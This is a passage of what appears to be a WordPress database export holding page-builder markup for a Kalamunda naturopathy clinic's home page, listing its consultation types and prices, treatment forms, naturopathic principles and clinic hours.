header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">Choose from face-to-face or Zoom consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" hover_enabled=\"0\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" sticky_enabled=\"0\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" button_text_color=\"#000000\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_bg_enable_color=\"on\" button_border_color=\"#000000\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-26 20:07:07','2021-05-26 12:07:07','',28,'https://verde.desidrivers.com.au/?p=186',0,'revision','',0),(146,1,'2021-05-25 21:07:08','2021-05-25 13:07:08','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" hover_enabled=\"0\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" box_shadow_style=\"preset2\" custom_css_main_element=\"||||\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01-large.png\" title_text=\"2-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">Choose from face-to-face or Zoom consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row 